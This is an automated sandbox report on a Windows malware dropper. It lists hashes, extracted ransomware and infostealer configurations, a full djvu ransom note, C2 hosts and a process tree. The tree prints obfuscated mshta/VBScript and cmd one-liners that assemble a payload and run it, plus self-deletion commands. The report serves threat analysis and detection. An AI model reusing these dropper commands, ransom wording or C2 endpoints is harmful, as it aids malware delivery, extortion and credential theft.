Overview

overview

10

Static

static

Fri051e1e7444.exe

windows10_x64

10

Resubmissions

23-10-2021 15:52

211023-tbkbesdcfm 10

22-10-2021 17:40

211022-v8trsscggr 10

22-10-2021 15:55

211022-tc9ygacgan 10

22-10-2021 14:38

211022-rz1bfabgb8 10

Analysis

  • max time kernel
    1801s
  • max time network
    1803s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    22-10-2021 17:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Fri051e1e7444.exe

  • Size

    403KB

  • MD5

    b4c503088928eef0e973a269f66a0dd2

  • SHA1

    eb7f418b03aa9f21275de0393fcbf0d03b9719d5

  • SHA256

    2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2

  • SHA512

    c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

Score
10/10
djvuraccoonredlinesmokeloadersocelarsvidarxmrigzloader7c9b4504a63ed23664e38808e65948379b790395903921933937backdoorbotnetcollectiondiscoveryevasioninfostealerminerpersistenceransomwarespywarestealersuricatatrojan

Malware Config

Extracted

Path

C:\_readme.txt

Family

djvu

Ransom Note
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-pk3SGFlmek Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0341gSd743dw5bW9VHoXUsivc5FZ0yEV7QenO6CpYtFwFaxwujj
URLs

https://we.tl/t-pk3SGFlmek

Extracted

Family

vidar

Version

41.5

Botnet

903

C2

https://mas.to/@xeroxxx

Attributes
  • profile_id

    903

Extracted

Family

smokeloader

Version

2020

C2

http://gejajoo7.top/

http://sysaheu9.top/
rc4.i32
rc4.i32

Extracted

Family

vidar

Version

41.5

Botnet

937

C2

https://mas.to/@xeroxxx

Attributes
  • profile_id

    937

Extracted

Family

redline

C2

205.185.119.191:60857

Extracted

Family

vidar

Version

41.5

Botnet

921

C2

https://mas.to/@xeroxxx

Attributes
  • profile_id

    921

Extracted

Family

raccoon

Botnet

7c9b4504a63ed23664e38808e65948379b790395

Attributes
  • url4cnc

    http://telegka.top/capibar

    http://telegin.top/capibar

    https://t.me/capibar

rc4.plain
rc4.plain

Extracted

Family

vidar

Version

41.5

Botnet

933

C2

https://mas.to/@xeroxxx

Attributes
  • profile_id

    933

Extracted

Family

djvu

C2

http://rlrz.org/lancer

Signatures

  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

    ransomwaredjvu
  • Modifies Windows Defender Real-time Protection settings 3 TTPs
    evasiontrojan
  • Process spawned unexpected child process 8 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

    stealerraccoon
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

    stealersocelars
  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Windows security bypass 2 TTPs
    evasiontrojan
  • Zloader, Terdot, DELoader, ZeusSphinx

    Zloader is a malware strain that was initially discovered back in August 2015.

    trojanbotnetzloader
  • suricata: ET MALWARE DCRAT Activity (GET)

    suricata: ET MALWARE DCRAT Activity (GET)

    suricata
  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata
  • suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata
  • suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

    suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

    suricata
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

    suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

    suricata
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata
  • suricata: ET MALWARE Win32.Raccoon Stealer CnC Activity (dependency download)

    suricata: ET MALWARE Win32.Raccoon Stealer CnC Activity (dependency download)

    suricata
  • suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt

    suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt

    suricata
  • suricata: ET MALWARE Win32/Kelihos.F exe Download 2

    suricata: ET MALWARE Win32/Kelihos.F exe Download 2

    suricata
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
    evasion
  • Vidar Stealer 9 IoCs
    stealer
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Modifies extensions of user files 5 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    evasion
  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
    spywarestealer
  • Accesses Microsoft Outlook accounts 1 TTPs 2 IoCs
    collection
  • Accesses Microsoft Outlook profiles 1 TTPs 16 IoCs
    collection
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 13 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 8 IoCs
    evasiontrojan
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 13 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 8 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 38 IoCs
  • Drops file in Program Files directory 19 IoCs
  • Drops file in Windows directory 21 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 14 IoCs
  • NSIS installer 4 IoCs
    installer
  • Checks SCSI registry key(s) 3 TTPs 33 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 14 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 7 IoCs
    evasion
  • Discovers systems in the same network 1 TTPs 1 IoCs
    discovery
  • Enumerates system info in registry 2 TTPs 9 IoCs
  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 10 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
    evasionspywaretrojan
  • Runs net.exe
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 64 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: MapViewOfSection 29 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe
    "C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe"
    1⤵
    • Checks computer location settings
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4304
    • C:\Users\Admin\Pictures\Adobe Films\RqcBdtquQCGLaKIMXJSNd_ZL.exe
      "C:\Users\Admin\Pictures\Adobe Films\RqcBdtquQCGLaKIMXJSNd_ZL.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:1180
    • C:\Users\Admin\Pictures\Adobe Films\RYVmga2gCYCILuVDQzIlK5af.exe
      "C:\Users\Admin\Pictures\Adobe Films\RYVmga2gCYCILuVDQzIlK5af.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Checks processor information in registry
      PID:3876
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c taskkill /im RYVmga2gCYCILuVDQzIlK5af.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\RYVmga2gCYCILuVDQzIlK5af.exe" & del C:\ProgramData\*.dll & exit
        3⤵
          PID:648
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /im RYVmga2gCYCILuVDQzIlK5af.exe /f
            4⤵
            • Kills process with taskkill
            PID:2012
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 6
            4⤵
            • Delays execution with timeout.exe
            PID:2832
      • C:\Users\Admin\Pictures\Adobe Films\OcB4jBzI70tFnRtK1WZB1Ocm.exe
        "C:\Users\Admin\Pictures\Adobe Films\OcB4jBzI70tFnRtK1WZB1Ocm.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:4368
        • C:\Users\Admin\Pictures\Adobe Films\OcB4jBzI70tFnRtK1WZB1Ocm.exe
          "C:\Users\Admin\Pictures\Adobe Films\OcB4jBzI70tFnRtK1WZB1Ocm.exe"
          3⤵
          • Executes dropped EXE
          • Checks SCSI registry key(s)
          • Suspicious behavior: MapViewOfSection
          PID:2768
      • C:\Users\Admin\Pictures\Adobe Films\UJrypcnxqC2LaOpY9q8RWOKu.exe
        "C:\Users\Admin\Pictures\Adobe Films\UJrypcnxqC2LaOpY9q8RWOKu.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4984
      • C:\Users\Admin\Pictures\Adobe Films\fgEDF5i3cgIOuMMvQaNZ1NCZ.exe
        "C:\Users\Admin\Pictures\Adobe Films\fgEDF5i3cgIOuMMvQaNZ1NCZ.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4236
        • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
          "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
          3⤵
          • Executes dropped EXE
          PID:3580
          • C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe
            "C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe"
            4⤵
            • Executes dropped EXE
            PID:4624
          • C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
            "C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Checks processor information in registry
            PID:3056
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c taskkill /im Soft1WW02.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe" & del C:\ProgramData\*.dll & exit
              5⤵
                PID:2496
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /im Soft1WW02.exe /f
                  6⤵
                  • Kills process with taskkill
                  PID:4336
                • C:\Windows\SysWOW64\timeout.exe
                  timeout /t 6
                  6⤵
                  • Delays execution with timeout.exe
                  PID:500
            • C:\Users\Admin\AppData\Local\Temp\setup.exe
              "C:\Users\Admin\AppData\Local\Temp\setup.exe"
              4⤵
              • Executes dropped EXE
              PID:4648
              • C:\Users\Admin\AppData\Local\Temp\is-NV6NO.tmp\setup.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-NV6NO.tmp\setup.tmp" /SL5="$F01CC,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:200
                • C:\Users\Admin\AppData\Local\Temp\setup.exe
                  "C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
                  6⤵
                  • Executes dropped EXE
                  PID:5160
                  • C:\Users\Admin\AppData\Local\Temp\is-CE7T0.tmp\setup.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-CE7T0.tmp\setup.tmp" /SL5="$502EE,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Drops file in Program Files directory
                    • Suspicious use of FindShellTrayWindow
                    PID:5276
                    • C:\Users\Admin\AppData\Local\Temp\is-01D20.tmp\postback.exe
                      "C:\Users\Admin\AppData\Local\Temp\is-01D20.tmp\postback.exe" ss1
                      8⤵
                      • Executes dropped EXE
                      PID:2524
                    • C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe
                      "C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart
                      8⤵
                      • Executes dropped EXE
                      PID:2876
                      • C:\436dd42121a8482a2d6b8730\Setup.exe
                        C:\436dd42121a8482a2d6b8730\\Setup.exe /q /norestart /x86 /x64 /web
                        9⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks processor information in registry
                        PID:5232
                    • C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe
                      "C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss1
                      8⤵
                      • Executes dropped EXE
                      • Checks computer location settings
                      PID:2568
            • C:\Users\Admin\AppData\Local\Temp\inst2.exe
              "C:\Users\Admin\AppData\Local\Temp\inst2.exe"
              4⤵
              • Executes dropped EXE
              PID:1068
            • C:\Users\Admin\AppData\Local\Temp\askinstall60.exe
              "C:\Users\Admin\AppData\Local\Temp\askinstall60.exe"
              4⤵
              • Executes dropped EXE
              PID:2072
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c taskkill /f /im chrome.exe
                5⤵
                  PID:5244
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im chrome.exe
                    6⤵
                    • Kills process with taskkill
                    PID:3696
              • C:\Users\Admin\AppData\Local\Temp\6.exe
                "C:\Users\Admin\AppData\Local\Temp\6.exe"
                4⤵
                • Executes dropped EXE
                PID:4644
                • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                  "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                  5⤵
                  • Executes dropped EXE
                  PID:1752
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                    6⤵
                      PID:5372
                      • C:\Windows\SysWOW64\PING.EXE
                        ping 1.1.1.1 -n 1 -w 3000
                        7⤵
                        • Runs ping.exe
                        PID:4888
                • C:\Users\Admin\AppData\Local\Temp\ligr-game.exe
                  "C:\Users\Admin\AppData\Local\Temp\ligr-game.exe"
                  4⤵
                  • Executes dropped EXE
                  PID:2976
                • C:\Users\Admin\AppData\Local\Temp\customer7.exe
                  "C:\Users\Admin\AppData\Local\Temp\customer7.exe"
                  4⤵
                  • Executes dropped EXE
                  PID:4940
                • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                  "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                  4⤵
                  • Executes dropped EXE
                  PID:5168
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 664
                    5⤵
                    • Program crash
                    PID:5404
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 708
                    5⤵
                    • Program crash
                    PID:5592
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 692
                    5⤵
                    • Program crash
                    PID:5656
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 856
                    5⤵
                    • Program crash
                    PID:5700
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 952
                    5⤵
                    • Program crash
                    PID:5760
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 1188
                    5⤵
                    • Program crash
                    PID:5900
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 1160
                    5⤵
                    • Program crash
                    PID:5936
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 1204
                    5⤵
                    • Suspicious use of NtCreateProcessExOtherParentProcess
                    • Program crash
                    PID:5960
                • C:\Users\Admin\AppData\Local\Temp\sfx.exe
                  "C:\Users\Admin\AppData\Local\Temp\sfx.exe"
                  4⤵
                  • Executes dropped EXE
                  PID:5228
                  • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                    "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                    5⤵
                    • Executes dropped EXE
                    PID:5932
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                      6⤵
                        PID:4688
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe" ) do taskkill -f -iM "%~NxM"
                          7⤵
                            PID:3816
                            • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                              ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                              8⤵
                              • Executes dropped EXE
                              PID:4004
                              • C:\Windows\SysWOW64\mshta.exe
                                "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                9⤵
                                  PID:3680
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                    10⤵
                                      PID:5756
                                  • C:\Windows\SysWOW64\mshta.exe
                                    "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                    9⤵
                                      PID:4568
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                        10⤵
                                          PID:5728
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                            11⤵
                                              PID:5464
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                              11⤵
                                                PID:5604
                                              • C:\Windows\SysWOW64\msiexec.exe
                                                msiexec -Y ..\lXQ2g.WC
                                                11⤵
                                                • Loads dropped DLL
                                                PID:4676
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill -f -iM "LzmwAqmV.exe"
                                          8⤵
                                          • Kills process with taskkill
                                          PID:5572
                                • C:\Users\Admin\AppData\Local\Temp\10.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  PID:5300
                                  • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                    "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                    5⤵
                                    • Loads dropped DLL
                                    PID:5436
                                • C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
                                  "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:5364
                            • C:\Users\Admin\Pictures\Adobe Films\mt5IRqNxCvOuLR7GM_no0d2t.exe
                              "C:\Users\Admin\Pictures\Adobe Films\mt5IRqNxCvOuLR7GM_no0d2t.exe"
                              2⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Checks processor information in registry
                              PID:4668
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c taskkill /im mt5IRqNxCvOuLR7GM_no0d2t.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\mt5IRqNxCvOuLR7GM_no0d2t.exe" & del C:\ProgramData\*.dll & exit
                                3⤵
                                  PID:4132
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /im mt5IRqNxCvOuLR7GM_no0d2t.exe /f
                                    4⤵
                                    • Kills process with taskkill
                                    PID:3236
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /t 6
                                    4⤵
                                    • Delays execution with timeout.exe
                                    PID:3272
                              • C:\Users\Admin\Pictures\Adobe Films\xcW3TuSn3KSNmakFvG9gZQDx.exe
                                "C:\Users\Admin\Pictures\Adobe Films\xcW3TuSn3KSNmakFvG9gZQDx.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • Suspicious use of WriteProcessMemory
                                PID:3680
                                • C:\Users\Admin\Pictures\Adobe Films\xcW3TuSn3KSNmakFvG9gZQDx.exe
                                  "C:\Users\Admin\Pictures\Adobe Films\xcW3TuSn3KSNmakFvG9gZQDx.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  PID:3436
                              • C:\Users\Admin\Pictures\Adobe Films\aoWnOtt3BnvpIQ5LuYSMKmgs.exe
                                "C:\Users\Admin\Pictures\Adobe Films\aoWnOtt3BnvpIQ5LuYSMKmgs.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:772
                                • C:\Users\Admin\AppData\Local\Temp\is-KM2OK.tmp\aoWnOtt3BnvpIQ5LuYSMKmgs.tmp
                                  "C:\Users\Admin\AppData\Local\Temp\is-KM2OK.tmp\aoWnOtt3BnvpIQ5LuYSMKmgs.tmp" /SL5="$40110,506127,422400,C:\Users\Admin\Pictures\Adobe Films\aoWnOtt3BnvpIQ5LuYSMKmgs.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:740
                                  • C:\Users\Admin\AppData\Local\Temp\is-A0VU2.tmp\DYbALA.exe
                                    "C:\Users\Admin\AppData\Local\Temp\is-A0VU2.tmp\DYbALA.exe" /S /UID=2710
                                    4⤵
                                    • Drops file in Drivers directory
                                    • Executes dropped EXE
                                    • Adds Run key to start application
                                    • Drops file in Program Files directory
                                    • Modifies system certificate store
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4500
                                    • C:\Program Files\Reference Assemblies\VRFCYSEISA\foldershare.exe
                                      "C:\Program Files\Reference Assemblies\VRFCYSEISA\foldershare.exe" /VERYSILENT
                                      5⤵
                                      • Executes dropped EXE
                                      • Suspicious behavior: GetForegroundWindowSpam
                                      PID:3932
                                    • C:\Users\Admin\AppData\Local\Temp\17-169ea-342-f7b94-07854e1c39058\SHodecytolae.exe
                                      "C:\Users\Admin\AppData\Local\Temp\17-169ea-342-f7b94-07854e1c39058\SHodecytolae.exe"
                                      5⤵
                                      • Executes dropped EXE
                                      • Checks computer location settings
                                      PID:4836
                              • C:\Users\Admin\Pictures\Adobe Films\gXt9NtnPmMCRWaXBrQk8NfGb.exe
                                "C:\Users\Admin\Pictures\Adobe Films\gXt9NtnPmMCRWaXBrQk8NfGb.exe"
                                2⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                • Suspicious use of WriteProcessMemory
                                PID:708
                                • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                  "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  PID:1740
                                • C:\Program Files (x86)\Company\NewProduct\inst3.exe
                                  "C:\Program Files (x86)\Company\NewProduct\inst3.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  PID:1576
                                • C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
                                  "C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1900
                              • C:\Users\Admin\Pictures\Adobe Films\_eKJw2OFuLijigALN0RShv0q.exe
                                "C:\Users\Admin\Pictures\Adobe Films\_eKJw2OFuLijigALN0RShv0q.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:996
                              • C:\Users\Admin\Pictures\Adobe Films\cwvHAknFTAWGE2B0rxX1TkrF.exe
                                "C:\Users\Admin\Pictures\Adobe Films\cwvHAknFTAWGE2B0rxX1TkrF.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:1308
                                • C:\Users\Admin\AppData\Local\Temp\build.exe
                                  "C:\Users\Admin\AppData\Local\Temp\build.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Checks processor information in registry
                                  PID:1276
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c taskkill /im build.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\build.exe" & del C:\ProgramData\*.dll & exit
                                    4⤵
                                      PID:896
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /im build.exe /f
                                        5⤵
                                        • Kills process with taskkill
                                        PID:1500
                                      • C:\Windows\SysWOW64\timeout.exe
                                        timeout /t 6
                                        5⤵
                                        • Delays execution with timeout.exe
                                        PID:1288
                                • C:\Users\Admin\Pictures\Adobe Films\FmIprFPSFzOTXlcTeprUC6YU.exe
                                  "C:\Users\Admin\Pictures\Adobe Films\FmIprFPSFzOTXlcTeprUC6YU.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:3824
                                  • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                    C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                    3⤵
                                    • Adds Run key to start application
                                    PID:6452
